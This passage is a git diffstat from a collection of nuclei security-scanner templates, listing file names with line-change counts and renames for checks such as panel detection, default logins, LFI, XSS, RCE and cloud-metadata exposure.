.../Other/manageengine-apex-helpdesk.yaml | 23 - ...nageengine-applications-manager-8753.yaml} | 0 .../manageengine-assetexplorer-8756.yaml | 19 + .../manageengine-assetexplorer-8757.yaml | 23 - .../Other/manageengine-keymanagerplus.yaml | 7 +- .../Other/manageengine-network-config.yaml | 14 +- .../Other/manageengine-opmanager-8768.yaml | 23 - .../Other/manageengine-opmanager.yaml | 19 + .../Other/manageengine-servicedesk.yaml | 7 +- .../manageengine-supportcenter-8775.yaml | 23 - .../Other/manageengine-supportcenter.yaml | 24 + .../Other/manageengine_netflow_analyzer.yaml | 20 + ...is-detect.yaml => mantis-detect-8780.yaml} | 0 .../mantisbt-default-credential-8778.yaml | 47 + nuclei-templates/Other/mantisbt-panel.yaml | 12 +- .../Other/mapbox-token-disclosure.yaml | 4 +- nuclei-templates/Other/mapbox-token.yaml | 5 +- ...r-8786.yaml => mashery-takeover-8785.yaml} | 0 ...s-hunt-CVE-2024-24919-with-many-paths.yaml | 35 +- ...hop-sqli.yaml => maticsoft-shop-sqli.yaml} | 0 
nuclei-templates/Other/matomo-installer.yaml | 5 +- .../Other/matomo-login-portal.yaml | 19 +- nuclei-templates/Other/matrix-detect.yaml | 7 +- ...-panel.yaml => mautic-crm-panel-8789.yaml} | 0 nuclei-templates/Other/mautic-installer.yaml | 5 +- ...rce-8790.yaml => mcafee-epo-rce-8793.yaml} | 0 nuclei-templates/Other/mcloud-installer.yaml | 11 +- .../Other/medium-takeover-8798.yaml | 20 + nuclei-templates/Other/medium-takeover.yaml | 17 - nuclei-templates/Other/meduza-stealer.yaml | 4 +- nuclei-templates/Other/megamenu.yaml | 2 +- nuclei-templates/Other/members-list-xss.yaml | 12 +- nuclei-templates/Other/members.yaml | 2 +- .../Other/memcached-stats-8800.yaml | 8 +- nuclei-templates/Other/memos-panel.yaml | 10 +- nuclei-templates/Other/merlin-c2-jarm.yaml | 5 +- .../Other/meshcentral-login-8801.yaml | 6 +- nuclei-templates/Other/meta-box.yaml | 2 +- nuclei-templates/Other/metabase-log4j.yaml | 36 +- ...se-panel.yaml => metabase-panel-8806.yaml} | 0 .../Other/metadata-alibaba-8808.yaml | 43 + nuclei-templates/Other/metadata-alibaba.yaml | 39 - nuclei-templates/Other/metadata-aws.yaml | 14 +- ...ta-azure.yaml => metadata-azure-8814.yaml} | 0 ...7.yaml => metadata-digitalocean-8818.yaml} | 0 ...-google.yaml => metadata-google-8820.yaml} | 0 nuclei-templates/Other/metadata-hetzner.yaml | 14 +- .../Other/metadata-openstack-8826.yaml | 39 - .../Other/metadata-openstack-8828.yaml | 40 + .../Other/metadata-oracle-8831.yaml | 40 + nuclei-templates/Other/metadata-oracle.yaml | 40 - .../Other/metasploit-c2-jarm.yaml | 5 +- nuclei-templates/Other/metasploit-c2.yaml | 9 +- nuclei-templates/Other/metasploit-panel.yaml | 10 +- .../Other/metasploit-setup-page.yaml | 15 +- nuclei-templates/Other/metatag-cms-8832.yaml | 35 - nuclei-templates/Other/metatag-cms-8833.yaml | 30 + .../Other/metaview-explorer-installer.yaml | 5 +- nuclei-templates/Other/meteor-takeover.yaml | 6 +- .../Other/metersphere-plugin-rce-8837.yaml | 52 + .../Other/metersphere-plugin-rce.yaml | 59 - 
nuclei-templates/Other/metinfo-lfi-8840.yaml | 33 + nuclei-templates/Other/metinfo-lfi.yaml | 30 - nuclei-templates/Other/mfiles-web-detect.yaml | 13 +- .../Other/microfocus-admin-server.yaml | 12 +- .../Other/microfocus-filr-panel.yaml | 12 +- .../Other/microfocus-vibe-panel.yaml | 13 +- .../microsoft-echange-server-detect.yaml | 32 - ...aml => microsoft-exchange-login-8846.yaml} | 0 .../Other/microsoft-exchange-panel-8848.yaml | 21 + .../Other/microsoft-exchange-panel.yaml | 24 - ...microsoft-exchange-server-detect-8854.yaml | 26 + ... => microsoft-exchange-workflow-8855.yaml} | 0 .../Other/microsoft-ftp-service.yaml | 52 +- .../Other/microsoft-iis-version.yaml | 12 +- .../Other/microsoft-sharepoint-detect.yaml | 6 +- .../Other/microsoft-teams-webhook-8856.yaml | 17 - .../Other/microsoft-teams-webhook-8858.yaml | 15 + .../Other/microstrategy-ssrf-8859.yaml | 3 - .../Other/microweber-detect-8862.yaml | 30 + nuclei-templates/Other/microweber-detect.yaml | 26 - nuclei-templates/Other/microweber-xss.yaml | 5 - .../Other/mikrotik-ftp-server-detect.yaml | 62 +- .../Other/mikrotik-graph-8870.yaml | 20 + nuclei-templates/Other/mikrotik-graph.yaml | 24 - .../Other/mikrotik-httpproxy.yaml | 5 +- .../Other/mikrotik-routeros-api.yaml | 13 +- .../Other/mikrotik-routeros-old.yaml | 12 +- nuclei-templates/Other/mikrotik-routeros.yaml | 6 +- .../Other/milesight-system-log.yaml | 4 +- .../Other/minimouse-lfi-8880.yaml | 24 + nuclei-templates/Other/minimouse-lfi.yaml | 28 - .../Other/minio-browser-8882.yaml | 24 - .../Other/minio-browser-8883.yaml | 20 + .../Other/minio-console-8886.yaml | 26 - nuclei-templates/Other/minio-console.yaml | 21 + ...889.yaml => minio-default-login-8888.yaml} | 0 .../Other/minio-default-password-8891.yaml | 0 nuclei-templates/Other/minio-detect-8892.yaml | 0 .../Other/mirai-unknown-rce-8899.yaml | 25 - nuclei-templates/Other/mirai-unknown-rce.yaml | 29 + .../Other/misconfigured-docker-8900.yaml | 26 - .../Other/misconfigured-docker.yaml | 22 + 
.../Other/misconfigured-redis.yaml | 74 +- .../Other/mismatched-ssl-certificate.yaml | 5 +- nuclei-templates/Other/misp-panel.yaml | 8 +- nuclei-templates/Other/missing-csp.yaml | 2 - nuclei-templates/Other/missing-hsts.yaml | 33 +- .../Other/missing-x-frame-options.yaml | 38 +- .../Other/mitel-panel-detect.yaml | 13 +- nuclei-templates/Other/ml-slider.yaml | 4 +- .../Other/mobile-management-panel.yaml | 9 +- .../Other/mobileiron-log4j-jndi-rce-8905.yaml | 36 + .../Other/mobileiron-log4j-jndi-rce.yaml | 41 - nuclei-templates/Other/mobileiron-login.yaml | 2 - nuclei-templates/Other/mobileiron-sentry.yaml | 5 +- .../Other/mobiproxy-dashboard.yaml | 12 +- .../Other/mobotix-default-login.yaml | 6 +- ...ra.yaml => mobotix-guest-camera-8911.yaml} | 0 nuclei-templates/Other/modoboa-panel.yaml | 13 +- .../Other/modula-image-gallery-xss.yaml | 15 +- .../Other/mofi4500-default-login.yaml | 8 +- ...-detect.yaml => moinmoin-detect-8916.yaml} | 0 .../Other/moleculer-microservices.yaml | 7 +- .../Other/mongodb-detect-8920.yaml | 20 + nuclei-templates/Other/mongodb-detect.yaml | 24 - .../Other/mongodb-exporter-metrics.yaml | 20 +- nuclei-templates/Other/mongodb-info-enum.yaml | 15 +- .../Other/mongodb-ops-manager-8922.yaml | 20 + .../Other/mongodb-ops-manager.yaml | 22 - .../Other/mongodb-unauth-8926.yaml | 22 - nuclei-templates/Other/mongodb-unauth.yaml | 23 + nuclei-templates/Other/mongoose-server.yaml | 5 +- .../Other/monitorix-exposure-8929.yaml | 28 - .../Other/monitorix-exposure-8933.yaml | 27 + .../Other/monstra-admin-panel.yaml | 12 +- nuclei-templates/Other/monstra-installer.yaml | 5 +- nuclei-templates/Other/monstracms-detect.yaml | 6 +- .../Other/moodle-changelog-8934.yaml | 31 - .../Other/moodle-changelog-8935.yaml | 26 + .../Other/moodle-filter-jmol-lfi-8937.yaml | 20 + .../Other/moodle-filter-jmol-lfi.yaml | 22 - .../Other/moodle-filter-jmol-xss-8942.yaml | 26 + .../Other/moodle-filter-jmol-xss-8945.yaml | 30 - nuclei-templates/Other/moodle-installer.yaml | 5 +- 
.../Other/moodle-jitsi-plugin-xss.yaml | 5 - .../Other/moodle-workplace-panel.yaml | 4 +- nuclei-templates/Other/moodle-xss-8950.yaml | 32 - nuclei-templates/Other/moodle-xss.yaml | 28 + .../{signatures-10245.yaml => moodle.yaml} | 0 .../Other/movable-type-login.yaml | 4 - nuclei-templates/Other/moveit-detect.yaml | 30 - .../Other/moveit-transfer-detect.yaml | 34 + .../Other/mpftvc-admin-panel.yaml | 9 +- .../Other/mpsec-isg1000-panel.yaml | 7 +- nuclei-templates/Other/mpsec-lfi-8957.yaml | 10 +- nuclei-templates/Other/mrtg-detect-8959.yaml | 29 - nuclei-templates/Other/mrtg-detect.yaml | 26 + nuclei-templates/Other/ms-adcs-detect.yaml | 53 +- ...s-exchange-server-reflected-xss-8962.yaml} | 0 .../Other/ms-exchange-server.yaml | 7 +- .../Other/ms-exchange-web-service.yaml | 8 +- nuclei-templates/Other/msmtp-config.yaml | 5 - nuclei-templates/Other/mspcontrol-login.yaml | 9 +- .../Other/mssql-default-logins.yaml | 4 +- nuclei-templates/Other/mssql-detect.yaml | 4 +- .../{msvod-sqli.yaml => msvod-sqli-8969.yaml} | 0 nuclei-templates/Other/mthemeunus-lfi.yaml | 12 +- .../Other/multilaser-pro-setup.yaml | 7 +- .../Other/music-store-open-redirect.yaml | 3 - nuclei-templates/Other/my-chatbot-xss.yaml | 13 +- nuclei-templates/Other/mybb-forum-detect.yaml | 12 +- .../Other/mybb-forum-install.yaml | 15 +- .../Other/mylittleadmin-panel.yaml | 9 +- .../Other/mylittlebackup-panel.yaml | 10 +- nuclei-templates/Other/mysql-detect.yaml | 59 +- .../Other/mysql-native-cred-bruteforce.yaml | 3 - .../Other/mysql-native-password-8980.yaml | 15 + .../Other/mysql-native-password.yaml | 18 - .../Other/mysqld-exporter-metrics.yaml | 7 +- nuclei-templates/Other/mystic-stealer.yaml | 5 +- nuclei-templates/Other/mystrom-panel.yaml | 9 +- nuclei-templates/Other/mythic-c2-jarm.yaml | 5 +- nuclei-templates/Other/mythic-c2-ssl.yaml | 5 +- nuclei-templates/Other/mythic-c2.yaml | 7 +- nuclei-templates/Other/myucms-lfr-8985.yaml | 1 - nuclei-templates/Other/nacos-auth-bypass.yaml | 7 +- 
nuclei-templates/Other/nacos-unauth.yaml | 8 +- .../Other/nagios-default-credential-8988.yaml | 24 - .../Other/nagios-default-credential.yaml | 23 + .../Other/nagios-default-login-8993.yaml | 34 - .../Other/nagios-default-login.yaml | 39 + nuclei-templates/Other/nagios-panel.yaml | 13 +- .../Other/nagios-status-page.yaml | 14 +- nuclei-templates/Other/nagios-xi-panel.yaml | 13 +- .../Other/nagiosxi-installer.yaml | 5 +- nuclei-templates/Other/nagvis-panel.yaml | 13 +- .../Other/namedprocess-exporter-metrics.yaml | 7 +- ...ml => nativechurch-wp-theme-lfd-8999.yaml} | 0 .../Other/natshell-path-traversal-9005.yaml | 19 + .../Other/natshell-path-traversal-9006.yaml | 24 - nuclei-templates/Other/natshell-rce.yaml | 8 +- .../Other/navicat-server-panel.yaml | 7 +- nuclei-templates/Other/ncentral-panel.yaml | 9 +- nuclei-templates/Other/nconf-panel.yaml | 9 +- nuclei-templates/Other/neighborly.yaml | 59 + nuclei-templates/Other/neo4j-browser.yaml | 12 +- nuclei-templates/Other/neobox-panel.yaml | 11 +- .../Other/neocase-hrportal-panel.yaml | 4 +- ...neos-detect.yaml => neos-detect-9014.yaml} | 0 nuclei-templates/Other/neos-panel.yaml | 8 +- nuclei-templates/Other/nessus-panel.yaml | 5 - ...etcore-unauth.yaml => netcore-unauth.yaml} | 0 .../Other/netdata-dashboard-detected.yaml | 45 +- nuclei-templates/Other/netdata-panel.yaml | 10 +- .../Other/netflix-conductor-ui-9023.yaml | 39 + .../Other/netflix-conductor-ui.yaml | 29 - .../Other/netflix-conductor-version-9024.yaml | 44 - .../Other/netflix-conductor-version.yaml | 37 + .../Other/netgear-router-auth-bypass-1.yaml | 32 + .../Other/netgear-router-auth-bypass-2.yaml | 32 + .../netgear-router-auth-bypass-9027.yaml | 34 + .../Other/netgear-router-auth-bypass.yaml | 34 - .../Other/netgear-router-exposure-9031.yaml | 36 + .../Other/netgear-router-exposure.yaml | 42 - .../netgear-wac124-router-auth-bypass.yaml | 16 +- ...rce.yaml => netgear-wnap320-rce-9032.yaml} | 0 .../Other/netis-info-leak-9036.yaml | 35 - 
nuclei-templates/Other/netis-info-leak.yaml | 30 + ...tis-router.yaml => netis-router-9037.yaml} | 0 nuclei-templates/Other/netlify-cms.yaml | 3 - nuclei-templates/Other/netlify-takeover.yaml | 3 +- .../Other/netman-default-login.yaml | 6 +- .../Other/netman_204_firmware.yaml | 24 + nuclei-templates/Other/netrc-9045.yaml | 38 + nuclei-templates/Other/netrc-9046.yaml | 35 - .../Other/netris-dashboard-panel.yaml | 9 +- .../Other/netscalar-aaa-login.yaml | 33 +- .../Other/netscaler-aaa-login-9050.yaml | 18 - .../Other/netscaler-aaa-login.yaml | 16 + .../Other/netscaler-gateway-9055.yaml | 22 + nuclei-templates/Other/netscaler-gateway.yaml | 16 - .../netsparker-enterprise-installer.yaml | 5 +- nuclei-templates/Other/netsparker-panel.yaml | 9 +- .../Other/netsus-default-login.yaml | 4 - .../Other/netsus-server-login-9062.yaml | 20 + .../Other/netsus-server-login.yaml | 20 - ...aml => netsweeper-open-redirect-9064.yaml} | 0 nuclei-templates/Other/netsweeper-rxss.yaml | 5 - .../netsweeper-webadmin-detect-9066.yaml | 24 + .../Other/netsweeper-webadmin-detect.yaml | 26 - nuclei-templates/Other/netterce.yaml | 28 - .../Other/network-camera-detect.yaml | 2 - .../Other/network_security_manager.yaml | 20 + .../Other/new-user-approve-xss.yaml | 16 +- .../Other/newrelic-pixie-apikey.yaml | 5 +- .../Other/newrelic-pixie-deploykey.yaml | 5 +- ...newsletter-manager-open-redirect-9075.yaml | 3 - .../Other/newsletter-open-redirect-9077.yaml | 5 +- nuclei-templates/Other/newsletter.yaml | 2 +- .../Other/next-gen_application_firewall.yaml | 20 + ...detect.yaml => nextcloud-detect-9079.yaml} | 0 .../Other/nextcloud-install-9082.yaml | 28 - .../Other/nextcloud-install-9085.yaml | 24 + .../Other/nextcloud-owncloud-detect.yaml | 24 +- .../Other/nextend-facebook-connect.yaml | 2 +- nuclei-templates/Other/nextgen-gallery.yaml | 2 +- nuclei-templates/Other/nextjs-redirect.yaml | 5 +- .../Other/nexus-default-login-9086.yaml | 39 + .../Other/nexus-default-login.yaml | 36 - 
.../Other/nexus-default-password.yaml | 3 - ...xus-detect.yaml => nexus-detect-9094.yaml} | 0 nuclei-templates/Other/nexus-panel.yaml | 4 +- nuclei-templates/Other/nginx-Detect.yaml | 19 + nuclei-templates/Other/nginx-admin-panel.yaml | 9 +- .../Other/nginx-auto-installer.yaml | 5 +- nuclei-templates/Other/nginx-detect.yaml | 22 - .../Other/nginx-linux-page-9102.yaml | 17 + nuclei-templates/Other/nginx-linux-page.yaml | 17 - .../Other/nginx-module-vts-xss-9108.yaml | 23 + .../Other/nginx-module-vts-xss-9109.yaml | 28 - .../Other/nginx-proxy-manager-9111.yaml | 29 + .../Other/nginx-proxy-manager.yaml | 26 - nuclei-templates/Other/nginx-shards.yaml | 4 +- nuclei-templates/Other/nginx-status.yaml | 4 +- .../Other/nginx-ui-dashboard.yaml | 14 +- .../Other/nginx-version-9121.yaml | 25 + nuclei-templates/Other/nginx-version.yaml | 30 - .../Other/nginx-vhost-traffic-status.yaml | 3 - .../Other/nginxwebui-runcmd-rce.yaml | 35 +- nuclei-templates/Other/ngrok-status-page.yaml | 9 +- nuclei-templates/Other/nh-c2.yaml | 7 +- ...l-enum.yaml => niagara-fox-info-enum.yaml} | 0 nuclei-templates/Other/nifi-detech.yaml | 3 - nuclei-templates/Other/nifi.yaml | 20 + nuclei-templates/Other/nimsoft-wasp.yaml | 6 +- nuclei-templates/Other/ninja-forms.yaml | 2 +- .../Other/ninjaform-open-redirect-9133.yaml | 31 + .../Other/ninjaform-open-redirect-9134.yaml | 35 - .../Other/node-integration-enabled-9136.yaml | 20 + .../Other/node-integration-enabled-9137.yaml | 21 - ...-detect.yaml => node-red-detect-9139.yaml} | 0 nuclei-templates/Other/nodebb-installer.yaml | 5 +- nuclei-templates/Other/noescape-login.yaml | 9 +- .../Other/nopcommerce-installer.yaml | 16 +- .../Other/nordex-wind-farm-portal.yaml | 10 +- .../Other/normhost-backup-server-manager.yaml | 12 +- nuclei-templates/Other/notebook.yaml | 24 + .../Other/notificationx-sqli.yaml | 66 +- nuclei-templates/Other/notion-detect.yaml | 5 +- nuclei-templates/Other/novnc-login-panel.yaml | 11 +- nuclei-templates/Other/novus-ip-camera.yaml | 
11 +- nuclei-templates/Other/nozomi-panel.yaml | 9 +- nuclei-templates/Other/np-data-cache.yaml | 9 +- nuclei-templates/Other/npm-accesstoken.yaml | 5 +- nuclei-templates/Other/npm-anonymous-cli.yaml | 6 +- .../Other/npm-cli-metrics-json.yaml | 6 +- nuclei-templates/Other/npm-debug-log.yaml | 6 +- nuclei-templates/Other/npm-log-file-9141.yaml | 22 - nuclei-templates/Other/npm-log-file.yaml | 18 + .../Other/npm-shrinkwrap-exposure.yaml | 13 +- nuclei-templates/Other/npmrc-authtoken.yaml | 5 +- nuclei-templates/Other/nport-web-console.yaml | 9 +- ...-9145.yaml => nps-default-login-9142.yaml} | 0 .../Other/nps-default-password.yaml | 3 - .../Other/ns-asg-file-read-9151.yaml | 8 +- nuclei-templates/Other/ns-asg.yaml | 22 + .../Other/nsicg-default-login.yaml | 11 +- nuclei-templates/Other/nsq-admin-panel.yaml | 10 +- nuclei-templates/Other/ntlm-directories.yaml | 119 +- nuclei-templates/Other/ntop-detect.yaml | 7 +- .../Other/ntop-panel-exposed.yaml | 5 +- .../Other/ntopng-traffic-dashboard.yaml | 14 +- nuclei-templates/Other/nuget-key.yaml | 5 +- .../Other/nuget-package-config.yaml | 6 +- .../Other/nuuno-network-login-9161.yaml | 20 + .../Other/nuuno-network-login.yaml | 24 - .../Other/nuuo-file-inclusion.yaml | 17 +- .../Other/nuuo-nvrmini2-rce-9170.yaml | 23 + .../Other/nuuo-nvrmini2-rce-9171.yaml | 27 - .../Other/nuxeo-platform-panel.yaml | 10 +- nuclei-templates/Other/nuxt-js-semi-lfi.yaml | 4 +- nuclei-templates/Other/nzbget-panel.yaml | 12 +- nuclei-templates/Other/o2-easy-panel.yaml | 12 +- .../Other/o2oa-default-login.yaml | 36 +- nuclei-templates/Other/o2oa.yaml | 20 + ...aml => oa-tongda-path-traversal-9178.yaml} | 0 .../Other/oa-v9-uploads-file-9191.yaml | 36 + .../Other/oa-v9-uploads-file.yaml | 32 - .../Other/oauth-access-key-9184.yaml | 15 + .../Other/oauth-access-key-9186.yaml | 18 - .../Other/oauth-credentials-json.yaml | 5 +- ...h2-detect-9183.yaml => oauth2-detect.yaml} | 0 .../Other/obsolete-ssh-version.yaml | 13 +- 
nuclei-templates/Other/ocean-extra.yaml | 2 +- nuclei-templates/Other/ocomon-panel.yaml | 20 +- .../Other/ocs-inventory-login.yaml | 21 +- .../Other/octobercms-default-login-9192.yaml | 65 + .../Other/octobercms-default-login-9193.yaml | 66 - ...etect.yaml => octobercms-detect-9195.yaml} | 0 .../Other/octoprint-3dprinter-detect.yaml | 8 +- ...t-login.yaml => octoprint-login-9198.yaml} | 0 ...irect.yaml => odoo-cms-redirect-9199.yaml} | 0 nuclei-templates/Other/odoo-openredirect.yaml | 2 +- nuclei-templates/Other/odoo-panel.yaml | 10 +- .../Other/ofbiz-default-login-9208.yaml | 30 + .../Other/ofbiz-default-login.yaml | 36 - .../Other/office-documents-links.yaml | 27 + .../Other/office-webapps-panel.yaml | 7 +- .../Other/office-webapps-ssrf.yaml | 2 +- ...yaml => office365-open-redirect-9214.yaml} | 0 nuclei-templates/Other/office_anywhere.yaml | 25 + .../Other/office_web_apps_server.yaml | 22 + nuclei-templates/Other/officedocuments.yaml | 24 - .../Other/officekeeper-admin-login.yaml | 9 +- .../Other/official-facebook-pixel.yaml | 2 +- nuclei-templates/Other/oidc-detect.yaml | 3 - ...detect-9219.yaml => oipm-detect-9221.yaml} | 0 .../ojs-unauthenticated-open-redirect.yaml | 3 - nuclei-templates/Other/oki-data.yaml | 6 +- .../Other/okiko-sfiler-portal-9230.yaml | 31 + .../Other/okiko-sfiler-portal.yaml | 26 - nuclei-templates/Other/okta-panel-9234.yaml | 25 - nuclei-templates/Other/okta-panel.yaml | 26 + .../Other/old-copyright-9236.yaml | 34 + nuclei-templates/Other/old-copyright.yaml | 39 - .../Other/oliver-library-lfi-9239.yaml | 25 - .../Other/oliver-library-lfi-9241.yaml | 22 + .../Other/olivetti-crf-detect-9244.yaml | 25 - .../Other/olivetti-crf-detect.yaml | 25 + nuclei-templates/Other/ollama.yaml | 20 + nuclei-templates/Other/olt-web-interface.yaml | 9 +- .../Other/omni-commerce-connect-detect.yaml | 7 +- nuclei-templates/Other/omniampx-panel.yaml | 9 +- .../Other/one-click-demo-import.yaml | 2 +- .../Other/one_line_checks_nuclei.yaml | 30 - 
.../Other/oneblog-detect-9247.yaml | 4 - .../Other/onlinefarm-management-xss.yaml | 6 +- .../Other/onliner-multiple-bugs.yaml | 26 + .../Other/onlyoffice-login-panel.yaml | 10 +- .../Other/oob-header-based-interaction.yaml | 4 - .../oob-param-based-interaction-9253.yaml | 6 +- ...yaml => opcache-status-exposure-9254.yaml} | 0 .../Other/open-game-panel-9279.yaml | 26 - nuclei-templates/Other/open-game-panel.yaml | 22 + .../Other/open-journal-systems.yaml | 6 +- .../Other/open-mjpg-streamer-9284.yaml | 9 +- .../Other/open-proxy-internal-9288.yaml | 136 - .../Other/open-proxy-internal.yaml | 111 + ...st-9293.yaml => open-proxy-localhost.yaml} | 0 .../Other/open-proxy-portscan-9296.yaml | 4 +- .../Other/open-redirect-9309.yaml | 27 + .../Other/open-redirect-plus.yaml | 607 + nuclei-templates/Other/open-redirect.yaml | 44 - nuclei-templates/Other/open-redirect2.yaml | 607 - .../open-stack-dashboard-login-9324.yaml | 21 + .../Other/open-stack-dashboard-login.yaml | 24 - ...n-virtualization-manager-detect-9325.yaml} | 0 ...pen-virtualization-manager-panel-9328.yaml | 38 - .../open-virtualization-manager-panel.yaml | 39 + nuclei-templates/Other/openai-key.yaml | 5 +- nuclei-templates/Other/openam-detection.yaml | 57 +- nuclei-templates/Other/openam-panel.yaml | 65 +- ...orkflow.yaml => openam-workflow-9259.yaml} | 0 nuclei-templates/Other/openapi.yaml | 20 +- nuclei-templates/Other/openbmcs-detect.yaml | 16 +- ...l => openbmcs-secret-disclosure-9260.yaml} | 0 ...bmcs-ssrf.yaml => openbmcs-ssrf-9261.yaml} | 0 nuclei-templates/Other/openbullet2-panel.yaml | 5 +- nuclei-templates/Other/opencart-panel.yaml | 12 +- .../Other/opencast-detect-9263.yaml | 25 + nuclei-templates/Other/opencast-detect.yaml | 21 - .../Other/opencats-default-login.yaml | 9 +- nuclei-templates/Other/opencats-panel.yaml | 13 +- nuclei-templates/Other/opencpu-panel.yaml | 15 +- nuclei-templates/Other/opencpu-rce.yaml | 14 +- nuclei-templates/Other/opencti-lfi-9268.yaml | 19 + 
nuclei-templates/Other/opencti-lfi.yaml | 36 - .../Other/opendreambox-webadmin-rce.yaml | 2 +- .../Other/openemr-default-login-9269.yaml | 46 + .../Other/openemr-default-login.yaml | 49 - .../Other/openemr-detect-9271.yaml | 25 + nuclei-templates/Other/openemr-detect.yaml | 24 - .../Other/openerp-database-9275.yaml | 22 - nuclei-templates/Other/openerp-database.yaml | 18 + .../Other/openethereum-server-detect.yaml | 7 +- .../Other/openfire-admin-panel.yaml | 15 +- nuclei-templates/Other/opengear-detect.yaml | 16 - nuclei-templates/Other/opengear-panel.yaml | 10 +- nuclei-templates/Other/openhap-detect.yaml | 8 +- nuclei-templates/Other/openmage-install.yaml | 5 +- .../Other/openmediavault-default-login.yaml | 11 +- nuclei-templates/Other/openmediavault.yaml | 20 + nuclei-templates/Other/opennebula-panel.yaml | 9 +- .../Other/opennms-log4j-jndi-rce.yaml | 26 +- ...ole.yaml => opennms-web-console-9287.yaml} | 0 nuclei-templates/Other/openresty-detect.yaml | 7 +- .../Other/openshift-installer-panel.yaml | 7 +- nuclei-templates/Other/openshift_origin.yaml | 20 + .../Other/opensis-detect-9314.yaml | 27 - nuclei-templates/Other/opensis-installer.yaml | 5 +- nuclei-templates/Other/opensis-lfi-9315.yaml | 27 + nuclei-templates/Other/opensis-lfi.yaml | 28 - nuclei-templates/Other/opensis-panel.yaml | 24 + ...rkflow-9319.yaml => opensis-workflow.yaml} | 0 nuclei-templates/Other/opensns-rce.yaml | 5 - nuclei-templates/Other/openssh-detect.yaml | 18 +- nuclei-templates/Other/openssh-detection.yaml | 6 +- .../Other/openssh-username-enumeration.yaml | 287 +- nuclei-templates/Other/openssl-detect.yaml | 6 +- .../Other/openstack-user-secrets.yaml | 6 +- .../opentouch-multimediaservices-panel.yaml | 5 +- nuclei-templates/Other/opentsdb-status.yaml | 4 +- nuclei-templates/Other/openvas-panel.yaml | 4 +- nuclei-templates/Other/openvpn-admin.yaml | 13 +- nuclei-templates/Other/openvpn-connect.yaml | 12 +- ...openvpn-hhi.yaml => openvpn-hhi-9329.yaml} | 0 
.../Other/openvpn-monitor-9331.yaml | 35 - nuclei-templates/Other/openvpn-monitor.yaml | 30 + .../Other/openvpn-router-management.yaml | 12 +- nuclei-templates/Other/openvz-web-login.yaml | 9 +- .../Other/openwrt-default-login-9332.yaml | 21 + .../Other/openwrt-default-login.yaml | 24 - .../Other/openwrt-login-9333.yaml | 36 - nuclei-templates/Other/openwrt-login.yaml | 27 + .../Other/openwrt-luci-panel.yaml | 8 +- nuclei-templates/Other/openx-detect-9334.yaml | 32 - nuclei-templates/Other/openx-detect.yaml | 27 + nuclei-templates/Other/openx-panel.yaml | 30 +- ...erations-automation-default-page-9337.yaml | 23 + .../operations-automation-default-page.yaml | 19 - nuclei-templates/Other/opinio-panel.yaml | 4 +- .../Other/optilink-ont1gew-gpon-rce-9342.yaml | 28 + .../Other/optilink-ont1gew-gpon-rce.yaml | 31 - nuclei-templates/Other/optinmonster.yaml | 2 +- nuclei-templates/Other/options-method.yaml | 7 +- .../Other/oracle-access-manager-detect.yaml | 5 +- .../Other/oracle-atg-commerce.yaml | 12 +- ...yaml => oracle-business-control-9347.yaml} | 0 .../Other/oracle-business-intelligence.yaml | 12 +- .../Other/oracle-cgi-printenv.yaml | 11 +- .../Other/oracle-containers-panel.yaml | 8 +- nuclei-templates/Other/oracle-dbcs-9353.yaml | 23 - nuclei-templates/Other/oracle-dbcs.yaml | 21 + ...oracle-ebs-bispgraph-file-access-9358.yaml | 20 + .../oracle-ebs-bispgraph-file-access.yaml | 23 - ....yaml => oracle-ebs-credentials-9365.yaml} | 0 .../oracle-ebs-credentials-disclosure.yaml | 28 + nuclei-templates/Other/oracle-ebs-lfi.yaml | 94 +- .../oracle-ebs-sqllog-disclosure-9371.yaml | 27 + .../Other/oracle-ebs-sqllog-disclosure.yaml | 30 - .../Other/oracle-ebs-xss-9375.yaml | 29 + .../Other/oracle-ebs-xss-9376.yaml | 33 - .../Other/oracle-ebusiness-openredirect.yaml | 2 +- ...oracle-ebusiness-registration-enabled.yaml | 4 - .../oracle-enterprise-manager-login.yaml | 11 +- .../Other/oracle-fatwire-lfi-9378.yaml | 25 - .../Other/oracle-fatwire-lfi.yaml | 29 + 
.../Other/oracle-httpserver-12c.yaml | 32 + .../Other/oracle-httpserver12c.yaml | 34 - .../Other/oracle-integrated-manager-9386.yaml | 31 - .../Other/oracle-integrated-manager.yaml | 32 + ...ml => oracle-iplanet-web-server-9392.yaml} | 0 nuclei-templates/Other/oracle-oam-xss(1).yaml | 24 + .../Other/oracle-opera-login.yaml | 5 +- .../Other/oracle-people-enterprise-9398.yaml | 25 - .../Other/oracle-people-enterprise.yaml | 26 + .../Other/oracle-people-sign-in-9399.yaml | 29 - .../Other/oracle-people-sign-in.yaml | 25 + .../Other/oracle-peoplesoft-workflow.yaml | 6 +- ...l-xss.yaml => oracle-siebel-xss-9402.yaml} | 0 nuclei-templates/Other/oracle-test-cgi.yaml | 5 +- ...-listner.yaml => oracle-tns-listener.yaml} | 0 .../Other/oracle-webcenter-sites.yaml | 5 +- .../Other/orangehrm-installer.yaml | 7 +- ...aml => orbiteam-bscw-server-lfi-9404.yaml} | 0 ...iteam-bscw-server-unauthenticated-lfi.yaml | 4 - nuclei-templates/Other/orchid-vms-panel.yaml | 12 +- nuclei-templates/Other/orcus-rat-c2.yaml | 5 +- nuclei-templates/Other/ords-panel.yaml | 34 +- .../Other/oscommerce-rce-9408.yaml | 30 + nuclei-templates/Other/oscommerce-rce.yaml | 35 - nuclei-templates/Other/osnexus-panel.yaml | 3 +- .../Other/osquery-fleet-detect.yaml | 11 +- nuclei-templates/Other/osticket-install.yaml | 20 +- nuclei-templates/Other/osticket-panel.yaml | 13 +- ...ect.yaml => otobo-open-redirect-9411.yaml} | 0 nuclei-templates/Other/otobo-panel-9412.yaml | 24 + nuclei-templates/Other/otobo-panel.yaml | 33 - nuclei-templates/Other/otter-blocks.yaml | 4 +- nuclei-templates/Other/ourmgmt3-panel.yaml | 10 +- nuclei-templates/Other/overseerr-panel.yaml | 7 +- .../Other/ovpn-config-exposed.yaml | 13 +- .../Other/owasp-juice-shop-detected-9418.yaml | 21 + .../Other/owasp-juice-shop-detected.yaml | 25 - ...-config.yaml => owncloud-config-9420.yaml} | 0 .../Other/owncloud-installer-exposure.yaml | 6 +- .../Other/oxid-eshop-installer.yaml | 5 +- nuclei-templates/Other/pa11y-dashboard.yaml | 5 +- 
